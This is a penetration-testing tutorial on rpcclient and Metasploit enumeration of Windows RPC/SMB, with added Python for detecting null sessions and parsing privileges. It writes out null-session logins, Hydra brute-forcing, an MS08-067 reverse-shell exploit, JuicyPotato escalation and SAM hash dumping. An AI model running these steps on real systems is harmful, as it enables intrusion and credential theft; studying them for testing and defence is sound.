
RPC Client Enumeration - Port 135

Pivoting for Red Teamers

Using rpcclient via Metasploit for Enumeration & Exploitation

rpcclient is a powerful tool used for enumerating and interacting with Windows RPC services. It is commonly used in penetration testing to extract usernames, groups, and policies from Windows machines.

Using rpcclient Manually (Without Metasploit)

If you already have valid credentials (or null session access), you can use rpcclient from Kali Linux:

rpcclient -U "" <TARGET_IP>

or

rpcclient -U "guest" <TARGET_IP>

🔹 If it prompts for a password, just press Enter to attempt a null session login.

Common Enumeration Commands


enumdomusers   # Enumerate domain users
queryuser <RID>  # Get user details (Replace <RID> with a user RID)
enumdomgroups  # Enumerate groups
querygroup <RID>  # Get group details
getsid  # Get security identifier (SID)
lookupnames <USERNAME>  # Get RID of a user

Using Metasploit’s rpcclient Modules

Step 1: Start Metasploit

msfconsole

Step 2: Use the SMB Login Module


use auxiliary/scanner/smb/smb_login
set RHOSTS <TARGET_IP>
set USERNAME <USER>
set PASSWORD <PASS>
run

✔ If it succeeds, you can use rpcclient with the valid credentials.

Step 3: Use auxiliary/scanner/smb/smb_enumusers


use auxiliary/scanner/smb/smb_enumusers
set RHOSTS <TARGET_IP>
set SMBDomain WORKGROUP
run

✔ This retrieves a list of valid Windows usernames via SMB.

Exploiting RPC Vulnerabilities

If RPC services are misconfigured or exploitable, you can try:

🔹 MS08-067 (EternalBlue Predecessor)


use exploit/windows/smb/ms08_067_netapi
set RHOSTS <TARGET_IP>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
run

✔ This exploits an old SMB vulnerability, useful for legacy systems.

🔹 Other SMB/RPC Exploits

search rpc
search smb

Pro Tips for Effective Enumeration

  • Try null sessions (-U "") – some systems allow unauthenticated access.
  • Use smbclient to check for SMB shares:
    smbclient -L //<TARGET_IP> -N
  • Brute-force with Hydra if needed:
    hydra -L users.txt -P passwords.txt smb://<TARGET_IP>
  • Combine rpcclient + smbclient to extract more data before exploitation.
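The null-session and Hydra tips above are also what a defender sees in the Windows Security log: a 4624 network logon (logon type 3) for ANONYMOUS LOGON, and a burst of 4625 failures from a single source address. The following Python is an added example, not code from the original post; it runs that detection logic over a constructed JSON-lines export of Security events. The sample records, addresses, user names, 60-second window and threshold of 5 are all assumptions made for the example.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample of Windows Security events exported as JSON lines.
# Field names follow the 4624/4625 event schema; hosts, names and times
# are invented for this example.
SAMPLE_EVENTS = """\
{"TimeCreated": "2024-05-01T10:00:01", "EventID": 4624, "LogonType": 3, "TargetUserName": "ANONYMOUS LOGON", "IpAddress": "10.0.0.25"}
{"TimeCreated": "2024-05-01T10:00:02", "EventID": 4625, "LogonType": 3, "TargetUserName": "administrator", "IpAddress": "10.0.0.25"}
{"TimeCreated": "2024-05-01T10:00:03", "EventID": 4625, "LogonType": 3, "TargetUserName": "jdoe", "IpAddress": "10.0.0.25"}
{"TimeCreated": "2024-05-01T10:00:04", "EventID": 4625, "LogonType": 3, "TargetUserName": "svc_backup", "IpAddress": "10.0.0.25"}
{"TimeCreated": "2024-05-01T10:00:05", "EventID": 4625, "LogonType": 3, "TargetUserName": "guest", "IpAddress": "10.0.0.25"}
{"TimeCreated": "2024-05-01T10:00:06", "EventID": 4625, "LogonType": 3, "TargetUserName": "administrator", "IpAddress": "10.0.0.25"}
{"TimeCreated": "2024-05-01T10:00:07", "EventID": 4625, "LogonType": 3, "TargetUserName": "jdoe", "IpAddress": "10.0.0.25"}
{"TimeCreated": "2024-05-01T10:05:00", "EventID": 4625, "LogonType": 3, "TargetUserName": "jdoe", "IpAddress": "10.0.0.77"}
{"TimeCreated": "2024-05-01T10:20:00", "EventID": 4625, "LogonType": 3, "TargetUserName": "jdoe", "IpAddress": "10.0.0.77"}
{"TimeCreated": "2024-05-01T10:30:00", "EventID": 4624, "LogonType": 3, "TargetUserName": "jdoe", "IpAddress": "10.0.0.40"}
"""


def load_events(text: str) -> List[dict]:
    """Parse JSON lines into event dicts with TimeCreated as a datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["TimeCreated"] = datetime.fromisoformat(ev["TimeCreated"])
        events.append(ev)
    return events


def find_null_sessions(events: List[dict]) -> List[dict]:
    """Successful network logons (4624, type 3) by ANONYMOUS LOGON: the
    footprint of an SMB/RPC null session."""
    return [
        ev for ev in events
        if ev["EventID"] == 4624
        and ev["LogonType"] == 3
        and ev["TargetUserName"].upper() == "ANONYMOUS LOGON"
    ]


def find_failed_logon_bursts(events: List[dict], threshold: int = 5,
                             window: timedelta = timedelta(seconds=60)) -> Dict[str, dict]:
    """Per source IP, the peak number of 4625 failures inside any sliding
    window, plus how many distinct accounts were tried (spraying indicator)."""
    failures = defaultdict(list)
    users = defaultdict(set)
    for ev in events:
        if ev["EventID"] == 4625:
            failures[ev["IpAddress"]].append(ev["TimeCreated"])
            users[ev["IpAddress"]].add(ev["TargetUserName"].lower())
    bursts = {}
    for ip, times in failures.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):
            # Slide the window start forward until it fits within `window`.
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            bursts[ip] = {"failures": peak, "distinct_users": len(users[ip])}
    return bursts


if __name__ == "__main__":
    evs = load_events(SAMPLE_EVENTS)
    for ev in find_null_sessions(evs):
        print(f"null session from {ev['IpAddress']} at {ev['TimeCreated']}")
    for ip, info in find_failed_logon_bursts(evs).items():
        print(f"failed-logon burst from {ip}: {info}")
```

ANONYMOUS LOGON network logons also occur legitimately (for example from the host itself during some SMB negotiations), so baseline the source addresses before alerting on them; the mitigation for the enumeration the post describes is to restrict anonymous access with the LSA RestrictAnonymous / RestrictAnonymousSAM settings rather than to rely on detection alone.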

RPC Client Exploitation and Privilege Escalation

Understanding `enumprivs` in RPCClient

When you run the following command in rpcclient, it lists the privileges of the user:

rpcclient -U "<USERNAME>" <TARGET_IP>
enumprivs

If it returns 35 privileges, it indicates that the user has extensive permissions, some of which can be exploited for privilege escalation.

High-Risk Privileges (Privilege Escalation)

| Privilege Name | Description and Attack Scenario |
| --- | --- |
| SeImpersonatePrivilege | Allows token impersonation; can be exploited using JuicyPotato/RoguePotato. |
| SeAssignPrimaryTokenPrivilege | Allows assigning tokens to processes; useful for privilege escalation. |
| SeBackupPrivilege | Allows reading all files, including sensitive registry hives (SAM and SYSTEM). |
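As an added example (not code from the original post), here is a small Python parser for the line formats rpcclient prints for the enumeration commands listed earlier (enumdomusers, enumdomgroups) and for enumprivs, tied to the High-Risk Privileges table above. It converts the hex RIDs to integers, labels well-known RIDs, flags the three high-risk privileges from the table when they appear in the list the server returns, and cross-checks the "found N privileges" header against the lines actually parsed. Only the line formats come from rpcclient; the embedded sample output, account names and RIDs are constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample output in the line formats rpcclient prints for
# enumdomusers, enumdomgroups and enumprivs (rpcclient separates the
# privilege name from its LUID with tabs; spaces are used here).
SAMPLE_OUTPUT = """\
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[svc_backup] rid:[0x451]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
found 3 privileges

SeImpersonatePrivilege       0:29 (0x0:0x1d)
SeBackupPrivilege            0:17 (0x0:0x11)
SeChangeNotifyPrivilege      0:23 (0x0:0x17)
"""

USER_RE = re.compile(r"^user:\[(?P<name>[^\]]*)\] rid:\[(?P<rid>0x[0-9a-fA-F]+)\]$")
GROUP_RE = re.compile(r"^group:\[(?P<name>[^\]]*)\] rid:\[(?P<rid>0x[0-9a-fA-F]+)\]$")
PRIV_RE = re.compile(r"^(?P<name>Se\w+Privilege)\s+\d+:\d+\s+\(0x[0-9a-fA-F]+:0x[0-9a-fA-F]+\)$")
COUNT_RE = re.compile(r"^found (?P<n>\d+) privileges$")

# Well-known RIDs present in every Windows domain or local SAM.
WELL_KNOWN_RIDS = {
    500: "built-in Administrator",
    501: "built-in Guest",
    502: "krbtgt",
    512: "Domain Admins",
    519: "Enterprise Admins",
}

# The high-risk privileges from the table above.
HIGH_RISK_PRIVS = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeBackupPrivilege",
}


def parse_rpcclient(text: str) -> Dict[str, object]:
    """Parse rpcclient output into users, groups and privileges.

    RIDs are converted from the hex form rpcclient prints to integers so
    they can be compared with the well-known values.
    """
    result = {"users": {}, "groups": {}, "privileges": [], "declared_priv_count": None}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = USER_RE.match(line)
        if m:
            result["users"][m["name"]] = int(m["rid"], 16)
            continue
        m = GROUP_RE.match(line)
        if m:
            result["groups"][m["name"]] = int(m["rid"], 16)
            continue
        m = PRIV_RE.match(line)
        if m:
            result["privileges"].append(m["name"])
            continue
        m = COUNT_RE.match(line)
        if m:
            result["declared_priv_count"] = int(m["n"])
    return result


def high_risk_privileges(parsed: Dict[str, object]) -> List[str]:
    """Privileges from the table above that appear in the returned list."""
    return sorted(p for p in parsed["privileges"] if p in HIGH_RISK_PRIVS)


def review(parsed: Dict[str, object]) -> List[str]:
    """Turn parsed output into findings a reviewer would act on."""
    findings = []
    for kind in ("users", "groups"):
        for name, rid in sorted(parsed[kind].items(), key=lambda kv: kv[1]):
            if rid in WELL_KNOWN_RIDS:
                findings.append(f"{kind[:-1]} '{name}' has well-known RID {rid} ({WELL_KNOWN_RIDS[rid]})")
    for priv in high_risk_privileges(parsed):
        findings.append(f"high-risk privilege listed: {priv}")
    declared = parsed["declared_priv_count"]
    parsed_count = len(parsed["privileges"])
    if declared is not None and declared != parsed_count:
        # A mismatch usually means truncated or interleaved output.
        findings.append(f"privilege count mismatch: header says {declared}, parsed {parsed_count}")
    return findings


if __name__ == "__main__":
    for finding in review(parse_rpcclient(SAMPLE_OUTPUT)):
        print(finding)
```

To use it on real output, run rpcclient non-interactively (for example with -c "enumdomusers;enumdomgroups;enumprivs") and feed the captured text to parse_rpcclient; the well-known RID labels are what make a renamed built-in Administrator account (RID 500) stand out in the user list.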

Exploiting Dangerous Privileges

If you find SeImpersonatePrivilege, you can try JuicyPotato for SYSTEM access:

msfconsole
use exploit/windows/local/juicypotato
set SESSION <SESSION_ID>
run

Extracting SAM Hashes (If `SeBackupPrivilege` is Present)

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save

Then use `secretsdump.py`:

python3 secretsdump.py -sam sam.save -system system.save LOCAL

🔗 Conclusion

By analyzing the privileges returned by rpcclient, attackers can exploit misconfigurations and escalate privileges to SYSTEM using tools like JuicyPotato or by extracting registry hives.
